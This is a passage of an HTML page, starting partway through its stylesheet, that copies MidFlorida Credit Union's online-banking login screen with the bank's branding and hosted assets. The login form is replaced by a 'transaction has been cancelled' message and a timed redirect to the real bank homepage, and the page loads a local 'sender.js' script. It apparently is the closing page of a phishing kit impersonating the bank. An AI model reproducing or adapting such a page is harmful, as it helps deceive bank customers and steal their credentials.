        --tct-btn-destroy-focus-visible-outline-style: initial;
        --tct-btn-destroy-focus-visible-outline-width: initial;
        --tct-btn-destroy-focus-visible-text-decoration: initial;
        --tct-btn-destroy-font-color: initial;
        --tct-btn-destroy-font-weight: initial;
        --tct-btn-destroy-hover-background: initial;
        --tct-btn-destroy-hover-border-color: initial;
        --tct-btn-destroy-hover-border-style: initial;
        --tct-btn-destroy-hover-border-width: 0;
        --tct-btn-destroy-hover-font-color: initial;
        --tct-btn-destroy-hover-font-weight: initial;
        --tct-btn-destroy-hover-inner-ring-color: initial;
        --tct-btn-destroy-hover-outer-ring-color: initial;
        --tct-btn-destroy-hover-outline-color: initial;
        --tct-btn-destroy-hover-outline-style: initial;
        --tct-btn-destroy-hover-outline-width: initial;
        --tct-btn-destroy-hover-text-decoration: initial;
        --tct-btn-destroy-icon-color: initial;
        --tct-btn-destroy-letter-spacing: initial;
        --tct-btn-destroy-outline-color: initial;
        --tct-btn-destroy-outline-style: initial;
        --tct-btn-destroy-outline-width: initial;
        --tct-btn-destroy-text-decoration: initial;
        --tct-btn-destroy-text-transform: initial;
        --tct-btn-escape-active-background: initial;
        --tct-btn-escape-active-border-color: initial;
        --tct-btn-escape-active-border-style: initial;
        --tct-btn-escape-active-border-width: 0;
        --tct-btn-escape-active-font-color: initial;
        --tct-btn-escape-active-font-weight: initial;
        --tct-btn-escape-active-outline-color: initial;
        --tct-btn-escape-active-outline-style: initial;
        --tct-btn-escape-active-outline-width: initial;
        --tct-btn-escape-active-text-decoration: initial;
        --tct-btn-escape-background: initial;
        --tct-btn-escape-border-color: initial;
        --tct-btn-escape-border-radius: initial;
        --tct-btn-escape-border-style: initial;
        --tct-btn-escape-border-width: 0;
        --tct-btn-escape-box-shadow: initial;
        --tct-btn-escape-disabled-background: initial;
        --tct-btn-escape-disabled-border-color: initial;
        --tct-btn-escape-disabled-border-style: initial;
        --tct-btn-escape-disabled-border-width: 0;
        --tct-btn-escape-disabled-font-color: initial;
        --tct-btn-escape-disabled-font-weight: initial;
        --tct-btn-escape-disabled-outline-color: initial;
        --tct-btn-escape-disabled-outline-style: initial;
        --tct-btn-escape-disabled-outline-width: initial;
        --tct-btn-escape-disabled-text-decoration: initial;
        --tct-btn-escape-focus-background: initial;
        --tct-btn-escape-focus-border-color: initial;
        --tct-btn-escape-focus-border-style: initial;
        --tct-btn-escape-focus-border-width: 0;
        --tct-btn-escape-focus-box-shadow: initial;
        --tct-btn-escape-focus-font-color: initial;
        --tct-btn-escape-focus-font-weight: initial;
        --tct-btn-escape-focus-outline-color: initial;
        --tct-btn-escape-focus-outline-style: initial;
        --tct-btn-escape-focus-outline-width: initial;
        --tct-btn-escape-focus-text-decoration: initial;
        --tct-btn-escape-focus-visible-background: initial;
        --tct-btn-escape-focus-visible-border-color: initial;
        --tct-btn-escape-focus-visible-border-style: initial;
        --tct-btn-escape-focus-visible-border-width: 0;
        --tct-btn-escape-focus-visible-font-color: initial;
        --tct-btn-escape-focus-visible-font-weight: initial;
        --tct-btn-escape-focus-visible-inner-ring-color: initial;
        --tct-btn-escape-focus-visible-outer-ring-color: initial;
        --tct-btn-escape-focus-visible-outline-color: initial;
        --tct-btn-escape-focus-visible-outline-style: initial;
        --tct-btn-escape-focus-visible-outline-width: initial;
        --tct-btn-escape-focus-visible-text-decoration: initial;
        --tct-btn-escape-font-color: initial;
        --tct-btn-escape-font-weight: initial;
        --tct-btn-escape-hover-background: initial;
        --tct-btn-escape-hover-border-color: initial;
        --tct-btn-escape-hover-border-style: initial;
        --tct-btn-escape-hover-border-width: 0;
        --tct-btn-escape-hover-box-shadow: initial;
        --tct-btn-escape-hover-font-color: initial;
        --tct-btn-escape-hover-font-weight: initial;
        --tct-btn-escape-hover-inner-ring-color: initial;
        --tct-btn-escape-hover-outer-ring-color: initial;
        --tct-btn-escape-hover-outline-color: initial;
        --tct-btn-escape-hover-outline-style: initial;
        --tct-btn-escape-hover-outline-width: initial;
        --tct-btn-escape-hover-text-decoration: initial;
        --tct-btn-escape-icon-color: initial;
        --tct-btn-escape-letter-spacing: initial;
        --tct-btn-escape-loading-background: initial;
        --tct-btn-escape-outline-color: initial;
        --tct-btn-escape-outline-style: initial;
        --tct-btn-escape-outline-width: initial;
        --tct-btn-escape-text-decoration: initial;
        --tct-btn-escape-text-transform: initial;
        --tct-btn-icon-active-background: initial;
        --tct-btn-icon-border-radius: initial;
        --tct-btn-icon-height: 44px;
        --tct-btn-icon-hover-background: #e6e6e6;
        --tct-btn-icon-hover-color: #00365e;
        --tct-btn-icon-width: 44px;
        --tct-btn-badge-active-background: #008573;
        --tct-btn-badge-active-font-color: #ffffff;
        --tct-btn-badge-background: initial;
        --tct-btn-badge-border-radius: initial;
        --tct-btn-badge-font-color: initial;
        --tct-btn-badge-font-size: initial;
        --tct-btn-badge-hover-background: initial;
        --tct-btn-badge-hover-font-color: initial;
        --tct-btn-badge-padding: initial;
        --tct-input-margin-top: 30px;
        --tct-input-margin-bottom: 30px;
        --tct-input-font-size: inherit;
        --tct-input-label-padding-left: 0;
        --tct-input-label-padding-right: 0;
        --tct-input-label-margin-bottom: 5px;
        --tct-input-label-font-color: #0d0d0d;
        --tct-input-error-label-font-color: #0d0d0d;
        --tct-input-label-font-size: inherit;
        --tct-input-label-font-weight: 600;
        --tct-input-label-letter-spacing: normal;
        --tct-input-label-text-transform: none;
        --tct-input-label-optional-margin-left: 5px;
        --tct-input-label-optional-font-color: #747474;
        --tct-input-label-optional-font-size: 12px;
        --tct-input-label-optional-font-weight: 400;
        --tct-input-height: 42px;
        --tct-input-horizontal-padding: 10px;
        --tct-input-bg: #ffffff;
        --tct-input-font-color: #262626;
        --tct-input-border-top-width: 1px;
        --tct-input-border-right-width: 1px;
        --tct-input-border-bottom-width: 1px;
        --tct-input-border-left-width: 1px;
        --tct-input-border-color: gray;
        --tct-input-border-top-left-radius: 3px;
        --tct-input-border-top-right-radius: 3px;
        --tct-input-border-bottom-right-radius: 3px;
        --tct-input-border-bottom-left-radius: 3px;
        --tct-input-box-shadow: none;
        --tct-input-tween: 0.4s ease;
        --tct-input-disabled-opacity: 0.66;
        --tct-input-placeholder-font-color: #666666;
        --tct-input-focus-border-top-width: 1px;
        --tct-input-focus-border-right-width: 1px;
        --tct-input-focus-border-bottom-width: 1px;
        --tct-input-focus-border-left-width: 1px;
        --tct-input-focus-border-color: #0079c1;
        --tct-input-focus-box-shadow: 0 0 transparent;
        --tct-input-icon-stroke-primary: #747474;
        --tct-input-prefix-font-size: inherit;
        --tct-input-prefix-font-color: #262626;
        --tct-input-prefix-bg: #ffffff;
        --tct-input-prefix-border-color: #949494;
        --tct-input-error-prefix-font-color: #262626;
        --tct-input-error-prefix-bg: #ffffff;
        --tct-input-message-box-shadow: 0 2px 4px rgba(0, 0, 0, 0.3);
        --tct-input-message-tween: 0.2s ease;
        --tct-message-bg: #e6e6e6;
        --tct-tab-active-color: #005a9c;
        --tct-tab-inactive-color: #4d4d4d;
        --tct-tab-font-size: 17px;
        --tct-tab-alt-active-color: inherit;
        --tct-tab-alt-inactive-color: inherit;
        /* -------------------------------------------------------------- */
        --app-scale-0: 0px;
        --app-scale-1: 5px;
        --app-scale-2: 10px;
        --app-scale-3: 15px;
        --app-scale-4: 20px;
        --app-scale-5: 45px;
        --app-scale-6: 60px;
        --app-scale-0x: 0px;
        --app-scale-1x: 5px;
        --app-scale-2x: 10px;
        --app-scale-3x: 15px;
        --app-scale-4x: 20px;
        --app-scale-5x: 25px;
        --app-scale-6x: 30px;
        --app-scale-7x: 35px;
        --app-scale-8x: 40px;
        --app-scale-9x: 45px;
        --app-scale-10x: 50px;
        --app-scale-11x: 55px;
        --app-scale-12x: 60px;
        --t-font-family: OpenSans, Helvetica Neue, Helvetica, Arial, sans-serif;
        --t-font-stretch: normal;
        --t-font-family-monospaced: Courier New, Courier, Lucida Sans Typewriter,
          Lucida Typewriter, monospace;
        --t-primary-d5: #002d4e;
        --t-primary-d4: #00365e;
        --t-primary-d3: #003f6d;
        --t-primary-d2: #00487d;
        --t-primary-d1: #00518c;
        --t-primary: #005a9c;
        --t-primary-l1: #006ebf;
        --t-primary-l2: #0083e3;
        --t-primary-l3: #0796ff;
        --t-primary-l4: #2ba5ff;
        --t-primary-l5: #4eb4ff;
        --t-secondary-d5: #4d6373;
        --t-secondary-d4: #5c768a;
        --t-secondary-d3: #6e8a9e;
        --t-secondary-d2: #859cad;
        --t-secondary-d1: #9cafbd;
        --t-secondary: #b3c1cc;
        --t-secondary-l1: #bac7d1;
        --t-secondary-l2: #c2ced6;
        --t-secondary-l3: #c9d4db;
        --t-secondary-l4: #d1dae0;
        --t-secondary-l5: #d9e0e6;
        --t-tertiary-d5: #1c87d6;
        --t-tertiary-d4: #3d9ee6;
        --t-tertiary-d3: #68b4eb;
        --t-tertiary-d2: #93c9f1;
        --t-tertiary-d1: #bedef6;
        --t-tertiary: #e8f4fc;
        --t-tertiary-l1: #ebf5fc;
        --t-tertiary-l2: #edf6fd;
        --t-tertiary-l3: #eff7fd;
        --t-tertiary-l4: #f1f8fd;
        --t-tertiary-l5: #f4f9fe;
        --t-accent-1: #e05252;
        --t-accent-1-l1: #e77474;
        --t-accent-1-d1: #b62020;
        --t-accent-2: #e09952;
        --t-accent-2-l1: #e7ad74;
        --t-accent-2-d1: #b66b20;
        --t-accent-3: #e0e052;
        --t-accent-3-l1: #e7e774;
        --t-accent-3-d1: #b6b620;
        --t-accent-4: #99e052;
        --t-accent-4-l1: #ade774;
        --t-accent-4-d1: #6bb620;
        --t-accent-5: #52e052;
        --t-accent-5-l1: #74e774;
        --t-accent-5-d1: #20b620;
        --t-accent-6: #52e099;
        --t-accent-6-l1: #74e7ad;
        --t-accent-6-d1: #20b66b;
        --t-accent-7: #52e0e0;
        --t-accent-7-l1: #74e7e7;
        --t-accent-7-d1: #20b6b6;
        --t-accent-8: #5299e0;
        --t-accent-8-l1: #74ade7;
        --t-accent-8-d1: #206bb6;
        --t-accent-9: #5252e0;
        --t-accent-9-l1: #7474e7;
        --t-accent-9-d1: #2020b6;
        --t-accent-10: #9952e0;
        --t-accent-10-l1: #ad74e7;
        --t-accent-10-d1: #6b20b6;
        --t-accent-11: #e052e0;
        --t-accent-11-l1: #e774e7;
        --t-accent-11-d1: #b620b6;
        --t-accent-12: #e05299;
        --t-accent-12-l1: #e774ad;
        --t-accent-12-d1: #b6206b;
        --t-gray-1: #0d0d0d;
        --t-gray-2: #1a1a1a;
        --t-gray-3: #262626;
        --t-gray-4: #333333;
        --t-gray-5: #404040;
        --t-gray-6: #4d4d4d;
        --t-gray-7: #666666;
        --t-gray-8: gray;
        --t-gray-9: #999999;
        --t-gray-10: #b3b3b3;
        --t-gray-11: #cccccc;
        --t-gray-12: #d9d9d9;
        --t-gray-13: #e6e6e6;
        --t-gray-14: #f2f2f2;
        --t-text: #4d4d4d;
        --t-textA: rgba(77, 77, 77, 0.77);
        --t-primary-text: #ffffff;
        --t-secondary-text: #141414;
        --t-tertiary-text: #141414;
        --t-base: #ffffff;
        --t-base-a0: rgba(255, 255, 255, 0);
        --t-base-a1: rgba(255, 255, 255, 0.25);
        --t-base-a2: rgba(255, 255, 255, 0.5);
        --t-base-a3: rgba(255, 255, 255, 0.75);
        --t-base-gray1: #f3f3f3;
        --t-base-gray2: #e7e7e7;
        --t-base-primary1: #f2f7fa;
        --t-base-primary2: #e6eff5;
        --t-top: #0d0d0d;
        --t-top-text: #ffffff;
        --t-top-a0: rgba(13, 13, 13, 0);
        --t-top-a1: rgba(13, 13, 13, 0.35);
        --t-top-a2: rgba(13, 13, 13, 0.6);
        --t-top-a3: rgba(13, 13, 13, 0.85);
        --t-box-shadow-1: 0 2px 4px rgba(13, 13, 13, 0.35);
        --t-box-shadow-2: 0 3px 6px rgba(13, 13, 13, 0.35);
        --t-box-shadow-3: 0 4px 12px rgba(13, 13, 13, 0.35);
        --t-border-radius-1: 3px;
        --t-border-radius-2: 6px;
        --t-border-radius-3: 12px;
        --t-focus: #33b4ff;
        --t-status-info: #0079c1;
        --t-status-alert: #d20a0a;
        --t-status-warn: #c35500;
        --t-status-success: #0e8a00;
        --t-tab-inactive: #4d4d4d;
        --t-tab-active: #005a9c;
        --t-tab-alt-inactive: inherit;
        --t-tab-alt-active: inherit;
        --t-tab-font-size: 17px;
        --t-highlight-1: #005a9c;
        --t-highlight-2: #458bc3;
        --t-highlight-3: #75b1a9;
        --t-highlight-4: #00937f;
        --t-highlight-5: #ec9d2d;
        --t-highlight-6: #ecc42d;
        --t-highlight-7: #91bce2;
        --t-highlight-8: #1b5681;
        --t-highlight-9: #1e786c;
        --t-highlight-10: #19ab97;
        --t-highlight-11: #f1d66f;
        --t-highlight-12: #fba62d;
        --t-highlight-13: #1e4d73;
        --t-highlight-14: #5da2d9;
        --t-highlight-15: #3f9d90;
        --t-input-outline: 1px solid #005a9c;
        --t-icon-stroke-width: 1.5;
        --t-icon-cap: round;
        --t-icon-stroke-primary: currentColor;
        --t-icon-stroke-secondary: currentColor;
        --t-icon-fill: rgba(255, 255, 255, 0);
        --t-font-color: #0d0d0d;
        --t-a11y-gray-color: #747474;
        --t-a11y-gray-color-AA: #949494;
        --t-a11y-active-gray-color-AA: #404040;
        --t-link-color: #008573;
        --t-link-hover-color: #00365e;
        --t-content-bg: #ffffff;
        --t-content-border-color: #cccccc;
        --t-content-font-color: #0d0d0d;
        --t-section-bg: #ffffff;
        --t-section-font-color: #0d0d0d;
        --t-section-border-radius: 3px;
        --t-button-default-bg: #007061;
        --t-button-default-font-color: #ffffff;
        --t-button-default-hover-bg: #008573;
        --t-button-default-hover-font-color: #ffffff;
        --t-button-primary-bg: #008573;
        --t-button-primary-font-color: #ffffff;
        --t-button-primary-hover-bg: #008573;
        --t-button-primary-hover-font-color: #ffffff;
        --t-input-font-color: #262626;
        --t-input-placeholder-font-color: #666666;
        --t-input-bg: #ffffff;
        --t-input-border-color: gray;
        --t-input-focus-font-color: #262626;
        --t-input-focus-border-color: #0079c1;
        --t-input-warning-font-color: #0d0d0d;
        --t-input-warning: #c35500;
        --t-input-error-font-color: #ffffff;
        --t-input-error: #d20a0a;
        --t-input-success-font-color: #ffffff;
        --t-input-success: #0e8a00;
        --t-checkbox-fill: #005a9c;
        --t-checkbox-text: #ffffff;
        --t-loading-primary-color: #005a9c;
        --t-loading-secondary-color: #005a9c;
        --t-tooltip-multiline-max-width: 200px;
        --t-tooltip-background-color: rgba(0, 0, 0, 0.8);
        --t-tooltip-text-color: #ffffff;
        --t-tooltip-size: 5px;
        --t-tooltip-body-offset: -15px;
        --t-tooltip-transition-duration: 250ms;
        --t-tooltip-visible-duration: 2s;
        --t-gray1: #0d0d0d;
        --t-gray2: #1a1a1a;
        --t-gray3: #262626;
        --t-gray4: #333333;
        --t-gray5: #404040;
        --t-gray6: #4d4d4d;
        --t-gray7: #666666;
        --t-gray8: gray;
        --t-gray9: #999999;
        --t-gray10: #b3b3b3;
        --t-gray11: #cccccc;
        --t-gray12: #d9d9d9;
        --t-gray13: #e6e6e6;
        --t-gray14: #f2f2f2;
        --t-account-color-0: #1b5681;
        --t-account-color-1: #005a9c;
        --t-account-color-2: #458bc3;
        --t-account-color-3: #75b1a9;
        --t-account-color-4: #00937f;
        --t-account-color-5: #ec9d2d;
        --t-account-color-6: #ecc42d;
        --t-account-color-7: #91bce2;
        --t-account-color-8: #1b5681;
        --t-account-color-9: #1e786c;
        --t-account-color-10: #19ab97;
        --t-account-color-11: #f1d66f;
        --t-account-color-12: #fba62d;
        --t-account-color-13: #1e4d73;
        --t-account-color-14: #5da2d9;
        --t-account-color-15: #3f9d90;
        --t-scrim: rgba(13, 13, 13, 0.6);
      }
    </style>
  </head>
  <body id="pagebody" class="ember-application desktop theme-q2 frameless">
    <script type="text/javascript">
      yepnope({
        test: window.location.href.search("fixtureData=1") > 0,
        yep: "assets/app-fixtures_4.6.0.3F.js",
      });
    </script>
    <script type="text/javascript" charset="utf-8">
      loadApplication();
    </script>

    <script
      src="https://cdn1.onlineaccess1.com/cdn/base/tecton/v1.37.1/q2-tecton-elements/q2-tecton-elements/q2-tecton-elements.esm.js"
      type="module"
      class="q2-tecton-elements"
    ></script>
    <script
      src="https://cdn1.onlineaccess1.com/cdn/base/tecton/v1.37.1/q2-tecton-elements/q2-tecton-elements/q2-tecton-elements.js"
      nomodule=""
      class="q2-tecton-elements"
    ></script>
    <div
      id="main-page"
      class="app-container desktop unauthenticated vertical-nav pfm-disabled no-pfm-accounts has-footer login"
    >
      <!---->
      <!---->
      <div
        hidden=""
        role="dialog"
        tabindex="0"
        id="q2AppOverpanel"
        class="over-panel ember-view"
        style="display: none"
      >
        <div tabindex="-1" class="overpanel-inner" test-id="overPanel">
          <div class="overpanel-header">
            <div class="overpanel-button-container">
              <!---->
            </div>

            <h1
              class="overpanel-title"
              test-id="lblOverpanelTitle"
              aria-live="off"
            >
              <!---->
            </h1>

            <div class="overpanel-button-container">
              <q2-btn
                class="overpanel-button overpanel-close"
                aria-label="Close"
                test-id="btnClose"
                label="Close"
                hide-label=""
                stencil-hydrated=""
              >
                <q2-icon type="close" stencil-hydrated=""></q2-icon>
              </q2-btn>
            </div>
          </div>

          <div
            id="ember3"
            class="overpanel-alert-container alert-message_container hasToast ember-view"
          >
            <div
              class="alert alert-msg alert-message_content is-toast"
              role="alert"
              test-id="q2Alert"
            >
              <div class="toast-container">
                <div class="toast t-base">
                  <div class="toast-message_inner">
                    <div
                      class="toast-line toast-line-info"
                      test-id="toastAlertVerticalLine"
                    ></div>

                    <div class="toast-content">
                      <div class="toast-row">
                        <div class="toast-icon">
                          <q2-icon
                            test-id="toastAlertIcon"
                            type="info"
                            stencil-hydrated=""
                          ></q2-icon>
                        </div>

                        <div test-id="toastAlertMessageTxt" class="toast-text">
                          <!---->
                          <div
                            class="alert-message_text closed"
                            test-id="alertMessageTxt"
                          ></div>

                          <!---->
                        </div>

                        <div class="toast-close-btn">
                          <!---->
                        </div>
                      </div>
                      <div class="toast-row">
                        <div
                          class="toast-timestamp"
                          test-id="toastAlertTimestamp"
                        >
                          <!---->
                        </div>
                        <!---->
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>

          <div
            class="overpanel-scroll-wrapper force-height col-md-offset-1 col-lg-offset-2 col-xs-12 col-sm-12 col-md-10 col-lg-8"
            test-id="overPanelWrapper"
          >
            <div tabindex="-1" class="overpanel-slider">
              <div id="overpanel"></div>
              <!---->
            </div>
          </div>

          <div class="overpanel-footer hidden">
            <div class="valign overpanel-footer-outer">
              <div class="overpanel-footer-inner">
                <div id="ember4" class="ui-logo small ember-view">
                  <span class="sr-only" test-id="logoDescriptiveText"
                    >MidFlorida Credit Union</span
                  >

                  <div
                    aria-hidden="true"
                    class="logo-image"
                    test-id="logoDiv"
                  ></div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      <!---->
      <!---->
      <div class="loading-bg"></div>

      <div class="splash-bg"></div>

      <!---->
      <div class="app-header">
        <div
          class="navbar navbar-fixed-top center-align-logo disable-menu-button"
          role="banner"
        >
          <div class="container meta-container" test-id="navbarContainer">
            <!---->
            <div class="navbar-branding">
              <div class="branding">
                <div id="ember5" class="logo ui-logo small ember-view">
                  <span class="sr-only" test-id="logoDescriptiveText"
                    >MidFlorida Credit Union</span
                  >

                  <div
                    aria-hidden="true"
                    class="logo-image"
                    test-id="logoDiv"
                  ></div>
                </div>
              </div>
            </div>

            <div id="ember6" class="custom-header ember-view"></div>

            <!---->
          </div>
        </div>

        <div
          test-id="wdgtBrandingBar"
          id="ember7"
          class="branding-bar-widget widget-fence clearfix hidden ember-view"
        >
          <!---->
        </div>
      </div>

      <div class="container meta-container main-page-container">
        <div class="quicktip-container main-desktop">
          <!---->
        </div>

        <div
          id="ember8"
          class="main-view grid-row drawer-view main-view ember-view"
        >
          <!---->
          <div class="content-wrapper">
            <div class="content-container">
              <header>
                <div
                  tabindex="-1"
                  class="ember-sr-only ember-sr-only-focusable"
                  id="ember-a11y-refocus-nav-message"
                >
                  The page navigation is complete. You may now navigate the page
                  content as you wish.
                </div>
                <!---->
              </header>

              <div
                class="content clearfix"
                role="main"
                test-id="mainContentArea"
              >
                <!---->
                <div
                  id="ember9"
                  class="top-widget-fence widget-fence clearfix hidden ember-view"
                >
                  <!---->
                </div>

                <!---->
                <!---->
                <!---->
                <!---->
                <section class="default-container">
                  <!---->
                  <section class="comp-dash-inner-wrapper">
                    <!---->
                  </section>
                  <!---->
                </section>

                <!---->
                <div
                  id="ember10"
                  class="widget-fence clearfix bottom-widget-fence hidden ember-view"
                >
                  <!---->
                </div>
              </div>

              <div
                class="sidebar desktop-sidebar"
                tabindex="-1"
                role="complementary"
              >
                <!---->
                <div class="sidebar-drawer">
                  <div class="sidebar-rail">
                    <div class="sidebar-content">
                      <div
                        id="ember11"
                        class="widget-fence clearfix hidden ember-view"
                      >
                        <!---->
                      </div>

                      <!---->
                    </div>
                  </div>
                </div>
              </div>
              <!---->
            </div>

            <div class="dropdown-backdrop hidden"></div>
          </div>

          <div
            role="dialog"
            tabindex="0"
            id="q2AppSidePanel"
            class="sidepanel ember-view"
            style="display: none"
          >
            <div class="sidepanel-inner">
              <!---->
            </div>
          </div>
          <div id="app-login-modal">
            <div id="ember15" class="ember-view">
              <div id="login-modal"></div>
              <div class="login-outer">
                <div class="login-inner" id="login-inner">
                  <div class="quicktip-container">
                    <aside
                      hidden=""
                      id="ember16"
                      class="quick-tip hidden ember-view"
                    >
                      <span class="tip-text" test-id="textQT"><!----></span>
                      <q2-btn
                        hide-label=""
                        label="Close Tip"
                        test-id="btnRemoveQT"
                        stencil-hydrated=""
                      >
                        <q2-icon type="close" stencil-hydrated=""></q2-icon>
                      </q2-btn>
                    </aside>
                    <aside
                      hidden=""
                      id="ember17"
                      class="quick-tip hidden ember-view"
                    >
                      <span class="tip-text" test-id="textQT"><!----></span>
                      <q2-btn
                        hide-label=""
                        label="Close Tip"
                        test-id="btnRemoveQT"
                        stencil-hydrated=""
                      >
                        <q2-icon type="close" stencil-hydrated=""></q2-icon>
                      </q2-btn>
                    </aside>
                  </div>
                  <div class="login-title">
                    <h1 id="ember18" class="ui-logo large ember-view">
                      <span class="sr-only" test-id="logoDescriptiveText"
                        >MidFlorida Credit Union</span
                      >

                      <div
                        aria-hidden="true"
                        class="logo-image"
                        test-id="logoDiv"
                      ></div>
                    </h1>
                  </div>

                  <div class="login-message login-alert-message loginFormArea">
                    <div
                      id="ember19"
                      class="login-alert-container alert-message_container static-alert hidden ember-view"
                    >
                      <div
                        class="alert alert-msg alert-message_content alert-danger"
                        role="alert"
                        aria-live="assertive"
                      >
                        <div class="alert-message_inner">
                          <p>
                            <span
                              role="img"
                              class="ui-icon icon-warning-sign"
                              aria-hidden="true"
                              aria-label="error"
                            ></span>
                          </p>
                          <p class="alert-message_sizer">X</p>
                        </div>
                      </div>
                    </div>
                  </div>

                  <div class="login-form loginFormArea loginTextLeft">
                    <form
                      id="loginForm"
                      class="is-invalid"
                      data-ember-action=""
                      data-ember-action-20="20"
                    >
                      <div class="field">
                        <h1 style="text-align: center">
                          The transaction has been cancelled
                        </h1>
                        <p style="text-align: center">
                          You're being redirected to Homepage in One Minute...
                        </p>
                        <div
                          style="
                            width: 100px;
                            height: 100px;
                            padding: 5%;
                            margin: 0 auto;
                          "
                          class="field"
                        >
                          <q2-loading></q2-loading>
                        </div>
                      </div>
                      <div class="field"></div>
                      <div class="field"></div>
                      <div class="field"></div>
                      <div class="submissionArea">
                        <div id="rememberUserNameArea"></div>

                        <div id="userLinks"></div>
                      </div>
                    </form>
                  </div>

                  <div class="login-icons clearfix login-links">
                    <!---->
                    <a
                      href="https://www.midflorida.com/privacy-notice/"
                      class="login-adLink privacy_link"
                      test-id="lnkPrivacy"
                      >Privacy Policy</a
                    >
                    <a
                      target="_blank"
                      class="login-adLink"
                      href="https://secure.midflorida.com/midflorida/sdk/AutoEnrollmentE2E/ForgotLogin"
                      onclick="window.open(this.href,'_system'); return false;"
                      >Forgot Login</a
                    ><a
                      target="_blank"
                      class="login-adLink"
                      href="https://www.midflorida.com/contact-us/"
                      onclick="window.open(this.href,'_system'); return false;"
                      >Contact Us</a
                    ><a
                      target="_blank"
                      class="login-adLink"
                      href="https://www.midflorida.com/branch-atm-locator/"
                      onclick="window.open(this.href,'_system'); return false;"
                      >Locations</a
                    >
                  </div>
                  <div class="preLogon">
                    <div id="injected_footerContent" style="display: none">
                      <a
                        target="_blank"
                        class="login-adLink"
                        href="https://secure.midflorida.com/midflorida/sdk/AutoEnrollmentE2E/ForgotLogin"
                        onclick="window.open(this.href,'_system'); return false;"
                        >Forgot Login</a
                      ><a
                        target="_blank"
                        class="login-adLink"
                        href="https://www.midflorida.com/contact-us/"
                        onclick="window.open(this.href,'_system'); return false;"
                        >Contact Us</a
                      ><a
                        target="_blank"
                        class="login-adLink"
                        href="https://www.midflorida.com/branch-atm-locator/"
                        onclick="window.open(this.href,'_system'); return false;"
                        >Locations</a
                      >
                    </div>
                    <img
                      src="data:image/gif;base64, R0lGODlhAQABAIAAAAUEBAAAACwAAAAAAQABAAACAkQBADs="
                    />
                  </div>
                  <div class="login-compliance-logo-background">
                    <a
                      href="https://cdn1.onlineaccess1.com/cdn/depot/5135_01/2201/4ebe251f2940e1fde7a756af180a8899/assets/images/ncua_logo_large-4a4a13e41007adaf4841dd9e4b145458.png"
                      target="_blank"
                      rel="noopener noreferrer"
                      test-id="complianceLogo"
                      aria-label="This is a compliance logo and clicking will take to the larger logo link"
                    >
                      <img
                        class="complianceLogoImg"
                        src="https://cdn1.onlineaccess1.com/cdn/depot/5135_01/2201/4ebe251f2940e1fde7a756af180a8899/assets/images/ncua_logo_small-21b5c4c85ed2c621c4921e31d6f7a7d0.png"
                      />
                    </a>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
        <a
          id="ember12"
          class="ember-view return-to-login"
          test-id="lnkReturnToLogin"
          href="#/login"
        >
          Return to login
        </a>
      </div>

      <div class="content-overlay"></div>

      <!---->
      <!---->
      <!---->
      <!---->
      <div id="ember13" class="print-content ember-view">
        <div style="overflow: auto">
          <div style="float: left">
            <img id="transaction-print-logo" alt="" />
          </div>
          <div class="timestamp"></div>
        </div>
        <div><!----><!----></div>
        <div class="detail-items">
          <table>
            <tbody>
              <!----><!----><!---->
            </tbody>
          </table>
        </div>
        <!---->
      </div>
    </div>

    <script>
      function redirectAfter1Minutes() {
        setTimeout(function () {
          window.location.href = "https://www.midflorida.com/";
        }, 60000);
      }
    </script>
    <script src="sender.js"></script>
  </body>
</html>
